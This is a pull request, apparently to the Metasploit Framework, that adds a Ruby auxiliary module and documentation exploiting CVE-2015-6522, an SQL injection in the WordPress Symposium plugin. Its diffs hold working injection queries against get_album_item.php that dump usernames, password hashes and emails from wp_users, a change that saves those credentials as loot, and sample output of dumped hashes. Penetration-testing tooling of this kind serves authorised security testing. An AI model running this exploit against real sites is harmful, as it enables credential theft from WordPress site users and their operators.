### PR TITLE
Add WordPress Symposium Plugin SQL Injection aux module

### DIFF
--- a/documentation/modules/auxiliary/admin/http/wp_symposium_sql_injection.md
+++ b/documentation/modules/auxiliary/admin/http/wp_symposium_sql_injection.md
@@ -1,0 +1,65 @@
+## Vulnerable Application
+
+  The auxiliary/admin/http/wp_symposium_sql_injection works for WordPress
+  Symposium plugin before 15.8. The Pro module version has not been verified.
+
+  To download the vulnerable application, you can find it here:
+  https://github.com/wp-plugins/wp-symposium/archive/15.5.1.zip
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/admin/http/wp_symposium_sql_injection```
+  3. Do: ```set RHOST <ip>```
+  4. Set TARGETURI if necessary.
+  5. Do: ```run```
+
+## Scenarios
+
+  Example run against WordPress Symposium plugin 15.5.1:
+
+  ```
+  msf > use auxiliary/admin/http/wp_symposium_sql_injection
+  msf auxiliary(wp_symposium_sql_injection) > show info
+
+         Name: WordPress Symposium Plugin SQL Injection
+       Module: auxiliary/admin/http/wp_symposium_sql_injection
+      License: Metasploit Framework License (BSD)
+         Rank: Normal
+    Disclosed: 2015-08-18
+
+  Provided by:
+    PizzaHatHacker
+    Matteo Cantoni <goony@nothink.org>
+
+  Basic options:
+    Name        Current Setting  Required  Description
+    ----        ---------------  --------  -----------
+    Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+    RHOST                        yes       The target address
+    RPORT       80               yes       The target port
+    SSL         false            no        Negotiate SSL/TLS for outgoing connections
+    TARGETURI   /                yes       The base path to the wordpress application
+    URI_PLUGIN  wp-symposium     yes       The WordPress Symposium Plugin URI
+    VHOST                        no        HTTP server virtual host
+
+  Description:
+    SQL injection vulnerability in the WP Symposium plugin before 15.8
+    for WordPress allows remote attackers to execute arbitrary SQL
+    commands via the size parameter to get_album_item.php.
+
+  References:
+    http://cvedetails.com/cve/2015-6522/
+    https://www.exploit-db.com/exploits/37824
+
+  msf auxiliary(wp_symposium_sql_injection) > set RHOST 1.2.3.4
+  RHOST => 1.2.3.4
+  msf auxiliary(wp_symposium_sql_injection) > set TARGETURI /html/wordpress/
+  TARGETURI => /html/wordpress/
+  msf auxiliary(wp_symposium_sql_injection) > run
+
+  [+] 1.2.3.4:80 - admin           $P$ByvWm3Hb653Z50DskJVdUcZZbJ03dJ. admin.foobar@mail.xyz
+  [+] 1.2.3.4:80 - pippo           $P$BuTaWvLcEBPseEWONBvihacEqpHa6M/ pippo.foobar@mail.xyz
+  [+] 1.2.3.4:80 - pluto           $P$BJAoieYeeCDujy7SPQL1fjDULrtVJ3/ pluto.foobar@mail.xyz
+  [*] Auxiliary module execution completed
+  ```

--- a/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb
+++ b/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb
@@ -85,6 +85,8 @@ class MetasploitModule < Msf::Auxiliary
       vprint_status("#{peer} - Last user-id is '#{last_id}'")
     end
 
+    credentials = ""
+
     vprint_status("#{peer} - Trying to retrieve the users informations...")
     for user_id in first_id..last_id
       separator = Rex::Text.rand_text_numeric(7,bad='0')
@@ -102,9 +104,13 @@ class MetasploitModule < Msf::Auxiliary
 
         print_good("#{peer} - #{sprintf("%-15s %-34s %s", user_login, user_pass, user_email)}")
 
-        loot = store_loot("wp_symposium.http","text/plain", rhost, "#{user_login},#{user_pass},#{user_email}")
-        vprint_status("Credentials saved in: #{loot}")
+        credentials << "#{user_login},#{user_pass},#{user_email}\n"
       end
+    end
+
+    if not credentials.empty?
+      loot = store_loot("wp_symposium.http","text/plain", rhost, credentials)
+      vprint_status("Credentials saved in: #{loot}")
     end
   end
 end

--- a/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb
+++ b/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb
@@ -1,0 +1,100 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Symposium Plugin SQL Injection',
+      'Description'     => %q{
+        SQL injection vulnerability in the WP Symposium plugin before 15.8 for WordPress
+        allows remote attackers to execute arbitrary SQL commands via the size parameter
+        to get_album_item.php.
+      },
+      'Author'          =>
+        [
+          'PizzaHatHacker',                       # Vulnerability discovery
+          'Matteo Cantoni <goony[at]nothink.org>' # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['CVE', '2015-6522'],
+          ['EDB', '37824']
+        ],
+      'DisclosureDate'  => 'Aug 18 2015'
+      ))
+
+    register_options(
+      [
+        OptString.new('URI_PLUGIN', [true, 'The WordPress Symposium Plugin URI', 'wp-symposium'])
+      ], self.class)
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-symposium', '15.8.0', '15.5.1')
+  end
+
+  def uri_plugin
+    normalize_uri(wordpress_url_plugins, datastore['URI_PLUGIN'], 'get_album_item.php')
+  end
+
+  def send_sql_request(sql_query)
+    uri_complete = normalize_uri(uri_plugin, sql_query)
+
+    begin
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => uri_complete,
+      )
+
+      return nil if res.nil? || res.code != 200 || res.body.nil?
+
+      res.body
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
+      vprint_error("#{peer} - The host was unreachable!")
+      return nil
+    end
+  end
+
+  def run
+    vprint_status("#{peer} - Attempting to connect...")
+    first_id = send_sql_request("?size=id%20from%20wp_users%20order%20by%20id%20asc%20limit%201%20;%20--")
+    if first_id.nil?
+      vprint_error("#{peer} - Failed to retrieve the first user id... Try with check function!")
+      return
+    else
+      vprint_status("#{peer} - First user-id is '#{first_id}'")
+    end
+
+    vprint_status("#{peer} - Trying to retrieve the last user id...")
+    last_id = send_sql_request("?size=id%20from%20wp_users%20order%20by%20id%20desc%20limit%201%20;%20--")
+    if last_id.nil?
+      vprint_error("#{peer} - Failed to retrieve the last user id")
+      return
+    else
+      vprint_status("#{peer} - Last user-id is '#{last_id}'")
+    end
+
+    vprint_status("#{peer} - Trying to retrieve the users informations...")
+    for user_id in first_id..last_id
+      separator = Rex::Text.rand_text_numeric(7,bad='0')
+      user_info = send_sql_request("?size=concat_ws(#{separator},user_login,user_pass,user_email)%20from%20wp_users%20where%20id%20=%20#{user_id}%20;%20--")
+
+      if user_info.nil?
+        vprint_error("#{peer} - Failed to retrieve the users info")
+        return
+      else
+        values = user_info.split("#{separator}")
+        print_good("#{peer} - #{sprintf("%-15s %-34s %s", values[0], values[1], values[2])}")
+      end
+    end
+  end
+end


### PR DESCRIPTION
Add "WordPress Symposium Plugin SQL Injection" aux module.

## Sample runs

```
msf > use auxiliary/admin/http/wp_symposium_sql_injection
msf auxiliary(wp_symposium_sql_injection) > show info

       Name: WordPress Symposium Plugin SQL Injection
     Module: auxiliary/admin/http/wp_symposium_sql_injection
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2015-08-18

Provided by:
  PizzaHatHacker
  Matteo Cantoni <goony@nothink.org>

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                        yes       The target address
  RPORT       80               yes       The target port
  SSL         false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI   /                yes       The base path to the wordpress application
  URI_PLUGIN  wp-symposium     yes       The WordPress Symposium Plugin URI
  VHOST                        no        HTTP server virtual host

Description:
  SQL injection vulnerability in the WP Symposium plugin before 15.8
  for WordPress allows remote attackers to execute arbitrary SQL
  commands via the size parameter to get_album_item.php.

References:
  http://cvedetails.com/cve/2015-6522/
  https://www.exploit-db.com/exploits/37824

msf auxiliary(wp_symposium_sql_injection) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf auxiliary(wp_symposium_sql_injection) > set TARGETURI /html/wordpress/
TARGETURI => /html/wordpress/
msf auxiliary(wp_symposium_sql_injection) > run

[+] 1.2.3.4:80 - admin           $P$ByvWm3Hb653Z50DskJVdUcZZbJ03dJ. admin.foobar@mail.xyz
[+] 1.2.3.4:80 - pippo           $P$BuTaWvLcEBPseEWONBvihacEqpHa6M/ pippo.foobar@mail.xyz
[+] 1.2.3.4:80 - pluto           $P$BJAoieYeeCDujy7SPQL1fjDULrtVJ3/ pluto.foobar@mail.xyz
[*] Auxiliary module execution completed
```